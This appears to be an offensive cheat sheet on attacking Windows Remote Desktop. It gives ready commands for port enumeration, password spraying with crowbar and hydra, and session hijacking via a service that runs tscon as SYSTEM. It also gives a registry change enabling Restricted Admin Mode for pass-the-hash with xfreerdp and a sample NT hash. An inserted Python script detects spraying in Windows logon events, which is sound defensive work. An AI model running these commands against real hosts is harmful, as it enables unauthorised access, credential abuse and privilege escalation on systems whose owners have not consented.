Attacking RDP
RDP (Remote Desktop Protocol) is Microsoft’s proprietary protocol for remote graphical access over TCP/3389.
Enumeration
nmap -Pn -p3389 192.168.2.143
Password Attacks
Password Spraying
Use password spraying to avoid account lockouts (one password against many users).
Crowbar:
crowbar -b rdp -s 192.168.220.142/32 -U users.txt -c 'password123'
Hydra:
hydra -L usernames.txt -p 'password123' 192.168.2.143 rdp
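Detection-side counterpart to the spraying above, added here as an example and not part of the original page: it scans constructed Windows Security log records for the pattern spraying leaves behind, many 4625 failures from one source spread across many accounts with only one or two attempts per account. Event IDs 4625/4624 and logon types 10 (RemoteInteractive) and 3 (Network, seen with NLA) are the standard Windows values; the tuple layout, thresholds and sample data are assumptions.

```python
"""Flag RDP password spraying in Windows Security log events (EventID 4625):
many failures from one source, each against a different account, few tries
per account. Logon type 10 is RDP (RemoteInteractive); behind NLA the
pre-auth failure is usually recorded as type 3, so both are considered."""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample records, not real telemetry:
# (timestamp, EventID, LogonType, TargetUserName, IpAddress)
SAMPLE_EVENTS = [
    ("2024-01-10T09:00:01", 4625, 10, "alice", "192.0.2.50"),
    ("2024-01-10T09:00:02", 4625, 10, "bob", "192.0.2.50"),
    ("2024-01-10T09:00:03", 4625, 3, "carol", "192.0.2.50"),
    ("2024-01-10T09:00:04", 4625, 10, "dave", "192.0.2.50"),
    ("2024-01-10T09:00:06", 4624, 10, "erin", "192.0.2.50"),  # the spray's hit
    ("2024-01-10T09:05:00", 4625, 10, "alice", "198.51.100.7"),
    ("2024-01-10T09:05:10", 4625, 10, "alice", "198.51.100.7"),  # one user retrying
    ("2024-01-10T09:05:20", 4625, 10, "alice", "198.51.100.7"),
]
RDP_LOGON_TYPES = {10, 3}


def detect_spray(events, window=timedelta(minutes=10), min_users=4, max_per_user=2):
    """Return {source_ip: sorted users} for each source whose failed RDP logons
    within some `window` touch >= min_users accounts, <= max_per_user each."""
    failures = defaultdict(list)  # ip -> [(timestamp, user)]
    for ts, event_id, logon_type, user, ip in events:
        if event_id == 4625 and logon_type in RDP_LOGON_TYPES:
            failures[ip].append((datetime.fromisoformat(ts), user))
    findings = {}
    for ip, attempts in failures.items():
        attempts.sort()
        for i, (start, _) in enumerate(attempts):  # slide the window forward
            per_user = defaultdict(int)
            for ts, user in attempts[i:]:
                if ts - start > window:
                    break
                per_user[user] += 1
            if len(per_user) >= min_users and max(per_user.values()) <= max_per_user:
                findings[ip] = sorted(per_user)
                break
    return findings


def accounts_hit(events, findings):
    """Successful RDP logons (4624) from a flagged source: reset these first."""
    return sorted({u for _, eid, lt, u, ip in events
                   if eid == 4624 and lt in RDP_LOGON_TYPES and ip in findings})
```

The single-account retries from 198.51.100.7 are deliberately not flagged, since a user mistyping a password is not a spray; tune the thresholds to your lockout policy.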
RDP Login
rdesktop -u admin -p password123 192.168.2.143
# or
xfreerdp /v:192.168.2.143 /u:admin /p:password123
RDP Session Hijacking
Hijack another user’s RDP session to escalate privileges. Requires local admin (to get SYSTEM).
List sessions:
query user
Create a service that runs tscon as SYSTEM, then start it:
sc.exe create sessionhijack binpath= "cmd.exe /k tscon <TARGET_SESSION_ID> /dest:<YOUR_SESSION_NAME>"
net start sessionhijack
Note: This method no longer works on Server 2019.
RDP Pass-the-Hash
Use an NT hash instead of a plaintext password. Requires Restricted Admin Mode enabled on target.
Enable Restricted Admin Mode:
reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
Connect with hash:
xfreerdp /v:192.168.220.152 /u:lewen /pth:300FF5E89EF33F83A8146C10F5AB9BB9